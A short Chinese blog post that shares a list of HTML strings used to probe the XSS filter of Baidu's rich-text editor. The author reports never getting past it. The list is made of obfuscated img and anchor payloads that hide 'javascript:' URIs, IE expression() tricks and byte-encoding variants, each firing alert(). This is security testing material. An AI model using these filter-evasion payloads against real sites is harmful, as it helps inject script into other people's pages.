来源:大风起兮云飞扬
今天有朋友和我讨论了一下关于百度富文本编辑器 XSS Filter的问题,关于过滤规则可以看我之前在WoBB的终章里总结的8条规则。
这里我可以把我测试XSS Filter的部分html发一下,希望能帮助到某些朋友。(当然我最终还是没绕过去)
如下:
<img src=”java/*/*javascript*/script/*javascript*/*/script:alert();” >
<img src=”java/*/*javascript*/java/*javascript*/script/*javascript*/*/script:alert();” >
<img src=”java/*java/*javascript*/1script*/script:alert();”>
<img src=”java/*script:alert();”><img src=”javaa*/script:alert();”>
<img src=”java/*exp/**/script:alert();*/ression(alert(1))”>
<img style=”width: exp/*ression(alert());” src=”java/*exp/**/script:alert();*/ression(alert(1))”>
<!–[if IE]><![endif]–>
<img src=”java/*javascript*/script java/script:alert();”>
<img src=”java/*javascript*/1script/*><x src=javascript:alert();”>
<img src=”java/*java/*javascript*/1script*/script:alert();/*><x fvck=java/*style=/java*/script:alert();>
<img src=”java/*java/*<a fvck=’java/*style=/java*/script:alert();’>*/1script*/script:alert();”>
<img src=”java/*java <a href=’/*java/*style=/java*/script:alert();’>*/script:alert(); > ”
<img src=<java/*<<a>>*/scrip >>
<a style=”background-image: url(@import /’ fvck/’) ” >
<img onbeforeupdate=”fvck” ondataavailable=”fvck” onrowsdelete=”fvck” onrowsinserted=”fvck” />
<img src=”java/*ssss%c1*/script:alert();*/”>
<img src=”java/*sssss%c1*/%c1/*script:alert();*/script:alert();”>
<img src=”java/*java <a href=’java/*java/*style=%c1/java%c1*/script:alert();’>*/script:alert(); > “>
<img src=”javascript:alert();”>
%ef’);alert();(
<img src=”j%c1%26;javascript:alert();” >
<img src=”java/*xxxx%81*/script:alert();” >
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论